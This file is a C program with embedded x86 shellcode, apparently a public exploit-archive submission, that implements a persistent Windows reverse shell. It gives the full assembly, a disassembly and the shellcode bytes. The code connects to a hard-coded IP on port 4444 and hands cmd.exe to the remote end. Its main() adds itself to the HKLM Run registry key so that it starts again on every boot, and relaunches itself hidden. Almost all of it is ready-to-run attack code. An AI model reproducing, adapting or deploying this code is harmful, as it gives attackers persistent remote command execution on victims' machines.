/*
# Title : Windows x86 persistent reverse shell tcp
# Author : Roziul Hasan Khan Shifat
# Date : 04-09-2016
# Tested on : Windows 7 x86
*/
/*
Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32.dll
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
xor edx,edx
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jne g
cmp dword [eax+4],'rocA'
jne g
cmp dword [eax+8],'ddre'
jne g
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
xor eax,eax
push eax
sub esp,24
lea esi,[esp]
mov [esi],dword edx ;GetProcAddress() at offset 0
mov edi,ecx ;kernel32.dll
;------------------------------
;finding address of CreateProcessA()
push 0x42424173
mov [esp+2],word ax
push 0x7365636f
push 0x72506574
push 0x61657243
lea eax,[esp]
push eax
push ecx
call edx
;----------------------------
add esp,16
mov [esi+4],dword eax ;CreateProcessA() at offset 4
;-----------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
lea ecx,[esp]
push ecx
push edi
call dword [esi]
add esp,12
mov [esi+8],dword eax ;ExitProcess() at offset 8
;-----------------------------------------------------
;loading ws2_32.dll
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
lea ecx,[esp]
push ecx
push edi
call dword [esi]
add esp,12
xor ecx,ecx
push 0x41416c6c
mov [esp+2],word cx
push 0x642e3233
push 0x5f327377
lea ecx,[esp]
push ecx
call eax
add esp,8
mov edi,eax ;ws2_32.dll
;-----------------------------------
;finding address of WSAStartup()
xor ecx,ecx
push 0x41417075
mov [esp+2],word cx
push 0x74726174
push 0x53415357
lea ecx,[esp]
push ecx
push eax
call dword [esi]
add esp,12
mov [esi+12],dword eax ;WSAStartup() at offset 12
;------------------------------------------
;finding address of WSASocketA()
xor ecx,ecx
push 0x42424174
mov [esp+2],word cx
push 0x656b636f
push 0x53415357
lea ecx,[esp]
push ecx
push edi
call dword [esi]
add esp,12
mov [esi+16],dword eax ;WSASocketA() at offset 16
;-----------------------------
;finding address of WSAConnect()
xor ecx,ecx
push 0x41417463
mov [esp+2],word cx
push 0x656e6e6f
push 0x43415357
lea ecx,[esp]
push ecx
push edi
call dword [esi]
add esp,12
mov [esi+20],dword eax ;WSAConnect() at offset 20
;------------------------------------------------
;WSAStartup(514, &WSADATA)
xor ecx,ecx
push ecx
mov cx,400
sub esp,ecx
lea ecx,[esp]
xor ebx,ebx
mov bx,514
push ecx
push ebx
call dword [esi+12]
;-------------------------------
;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
xor ecx,ecx
push ecx
push ecx
push ecx
mov cl,6
push ecx
sub ecx,5
push ecx
inc ecx
push ecx
call dword [esi+16]
xchg edi,eax ;SOCKET
;--------------------------------------------------
;WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL)
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
mov [esp],byte 2
mov [esp+2],word 0x5c11 ;port 4444 (change it if U want)
mov [esp+4],dword 0x81e8a8c0 ;Change it
connect:
xor ecx,ecx
lea ebx,[esp]
push ecx
push ecx
push ecx
push ecx
mov cl,16
push ecx
push ebx
push edi
call dword [esi+20]
xor ecx,ecx
cmp eax,ecx
jnz connect
;----------------------------------------------
xor ecx,ecx
sub esp,16
lea edx,[esp] ;PROCESS_INFORMATION
push edi
push edi
push edi
push ecx
push word cx
push word cx
mov cl,255
inc ecx
push ecx
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
mov cl,68
push ecx
lea ecx,[esp]
xor edx,edx
push 0x41657865
mov [esp+3],byte dl
push 0x2e646d63
lea edx,[esp]
;-----------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info)
push ebx
push ecx
xor ecx,ecx
push ecx
push ecx
push ecx
inc ecx
push ecx
xor ecx,ecx
push ecx
push ecx
push edx
push ecx
call dword [esi+4]
push eax
call dword [esi+8]
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx
00000023 <g>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <g>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <g>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <g>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 31 c0 xor %eax,%eax
4d: 50 push %eax
4e: 83 ec 18 sub $0x18,%esp
51: 8d 34 24 lea (%esp),%esi
54: 89 16 mov %edx,(%esi)
56: 89 cf mov %ecx,%edi
58: 68 73 41 42 42 push $0x42424173
5d: 66 89 44 24 02 mov %ax,0x2(%esp)
62: 68 6f 63 65 73 push $0x7365636f
67: 68 74 65 50 72 push $0x72506574
6c: 68 43 72 65 61 push $0x61657243
71: 8d 04 24 lea (%esp),%eax
74: 50 push %eax
75: 51 push %ecx
76: ff d2 call *%edx
78: 83 c4 10 add $0x10,%esp
7b: 89 46 04 mov %eax,0x4(%esi)
7e: 31 c9 xor %ecx,%ecx
80: 68 65 73 73 41 push $0x41737365
85: 88 4c 24 03 mov %cl,0x3(%esp)
89: 68 50 72 6f 63 push $0x636f7250
8e: 68 45 78 69 74 push $0x74697845
93: 8d 0c 24 lea (%esp),%ecx
96: 51 push %ecx
97: 57 push %edi
98: ff 16 call *(%esi)
9a: 83 c4 0c add $0xc,%esp
9d: 89 46 08 mov %eax,0x8(%esi)
a0: 31 c9 xor %ecx,%ecx
a2: 51 push %ecx
a3: 68 61 72 79 41 push $0x41797261
a8: 68 4c 69 62 72 push $0x7262694c
ad: 68 4c 6f 61 64 push $0x64616f4c
b2: 8d 0c 24 lea (%esp),%ecx
b5: 51 push %ecx
b6: 57 push %edi
b7: ff 16 call *(%esi)
b9: 83 c4 0c add $0xc,%esp
bc: 31 c9 xor %ecx,%ecx
be: 68 6c 6c 41 41 push $0x41416c6c
c3: 66 89 4c 24 02 mov %cx,0x2(%esp)
c8: 68 33 32 2e 64 push $0x642e3233
cd: 68 77 73 32 5f push $0x5f327377
d2: 8d 0c 24 lea (%esp),%ecx
d5: 51 push %ecx
d6: ff d0 call *%eax
d8: 83 c4 08 add $0x8,%esp
db: 89 c7 mov %eax,%edi
dd: 31 c9 xor %ecx,%ecx
df: 68 75 70 41 41 push $0x41417075
e4: 66 89 4c 24 02 mov %cx,0x2(%esp)
e9: 68 74 61 72 74 push $0x74726174
ee: 68 57 53 41 53 push $0x53415357
f3: 8d 0c 24 lea (%esp),%ecx
f6: 51 push %ecx
f7: 50 push %eax
f8: ff 16 call *(%esi)
fa: 83 c4 0c add $0xc,%esp
fd: 89 46 0c mov %eax,0xc(%esi)
100: 31 c9 xor %ecx,%ecx
102: 68 74 41 42 42 push $0x42424174
107: 66 89 4c 24 02 mov %cx,0x2(%esp)
10c: 68 6f 63 6b 65 push $0x656b636f
111: 68 57 53 41 53 push $0x53415357
116: 8d 0c 24 lea (%esp),%ecx
119: 51 push %ecx
11a: 57 push %edi
11b: ff 16 call *(%esi)
11d: 83 c4 0c add $0xc,%esp
120: 89 46 10 mov %eax,0x10(%esi)
123: 31 c9 xor %ecx,%ecx
125: 68 63 74 41 41 push $0x41417463
12a: 66 89 4c 24 02 mov %cx,0x2(%esp)
12f: 68 6f 6e 6e 65 push $0x656e6e6f
134: 68 57 53 41 43 push $0x43415357
139: 8d 0c 24 lea (%esp),%ecx
13c: 51 push %ecx
13d: 57 push %edi
13e: ff 16 call *(%esi)
140: 83 c4 0c add $0xc,%esp
143: 89 46 14 mov %eax,0x14(%esi)
146: 31 c9 xor %ecx,%ecx
148: 51 push %ecx
149: 66 b9 90 01 mov $0x190,%cx
14d: 29 cc sub %ecx,%esp
14f: 8d 0c 24 lea (%esp),%ecx
152: 31 db xor %ebx,%ebx
154: 66 bb 02 02 mov $0x202,%bx
158: 51 push %ecx
159: 53 push %ebx
15a: ff 56 0c call *0xc(%esi)
15d: 31 c9 xor %ecx,%ecx
15f: 51 push %ecx
160: 51 push %ecx
161: 51 push %ecx
162: b1 06 mov $0x6,%cl
164: 51 push %ecx
165: 83 e9 05 sub $0x5,%ecx
168: 51 push %ecx
169: 41 inc %ecx
16a: 51 push %ecx
16b: ff 56 10 call *0x10(%esi)
16e: 97 xchg %eax,%edi
16f: 31 c9 xor %ecx,%ecx
171: 51 push %ecx
172: 51 push %ecx
173: 51 push %ecx
174: 51 push %ecx
175: c6 04 24 02 movb $0x2,(%esp)
179: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp)
180: c7 44 24 04 c0 a8 e8 movl $0x81e8a8c0,0x4(%esp)
187: 81
00000188 <connect>:
188: 31 c9 xor %ecx,%ecx
18a: 8d 1c 24 lea (%esp),%ebx
18d: 51 push %ecx
18e: 51 push %ecx
18f: 51 push %ecx
190: 51 push %ecx
191: b1 10 mov $0x10,%cl
193: 51 push %ecx
194: 53 push %ebx
195: 57 push %edi
196: ff 56 14 call *0x14(%esi)
199: 31 c9 xor %ecx,%ecx
19b: 39 c8 cmp %ecx,%eax
19d: 75 e9 jne 188 <connect>
19f: 31 c9 xor %ecx,%ecx
1a1: 83 ec 10 sub $0x10,%esp
1a4: 8d 14 24 lea (%esp),%edx
1a7: 57 push %edi
1a8: 57 push %edi
1a9: 57 push %edi
1aa: 51 push %ecx
1ab: 66 51 push %cx
1ad: 66 51 push %cx
1af: b1 ff mov $0xff,%cl
1b1: 41 inc %ecx
1b2: 51 push %ecx
1b3: 31 c9 xor %ecx,%ecx
1b5: 51 push %ecx
1b6: 51 push %ecx
1b7: 51 push %ecx
1b8: 51 push %ecx
1b9: 51 push %ecx
1ba: 51 push %ecx
1bb: 51 push %ecx
1bc: 51 push %ecx
1bd: 51 push %ecx
1be: 51 push %ecx
1bf: b1 44 mov $0x44,%cl
1c1: 51 push %ecx
1c2: 8d 0c 24 lea (%esp),%ecx
1c5: 31 d2 xor %edx,%edx
1c7: 68 65 78 65 41 push $0x41657865
1cc: 88 54 24 03 mov %dl,0x3(%esp)
1d0: 68 63 6d 64 2e push $0x2e646d63
1d5: 8d 14 24 lea (%esp),%edx
1d8: 53 push %ebx
1d9: 51 push %ecx
1da: 31 c9 xor %ecx,%ecx
1dc: 51 push %ecx
1dd: 51 push %ecx
1de: 51 push %ecx
1df: 41 inc %ecx
1e0: 51 push %ecx
1e1: 31 c9 xor %ecx,%ecx
1e3: 51 push %ecx
1e4: 51 push %ecx
1e5: 52 push %edx
1e6: 51 push %ecx
1e7: ff 56 04 call *0x4(%esi)
1ea: 50 push %eax
1eb: ff 56 08 call *0x8(%esi)
*/
#include<stdio.h>
#include<windows.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\xe8\x81\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08";
int main(int li,char *a[])
{
char info[200];
DWORD l;
HKEY i;
RegOpenKeyA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&i);
int r= RegQueryValueExA(i,"reverse_shell_tcp",0,NULL,(LPBYTE)info,&l);
if(i!=0)
{
RegSetValueExA(i,"reverse_shell_tcp",0,REG_SZ,a[0],strlen(a[0]));
RegCloseKey(i);
}
else
RegCloseKey(i);
int mode;
if(li==1)
mode=1;
else
mode=atoi(a[1]);
switch(mode)
{
case 78:
(* (int(*)())shellcode )();
break;
case 1:
default:
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
break;
}
return 0;
}
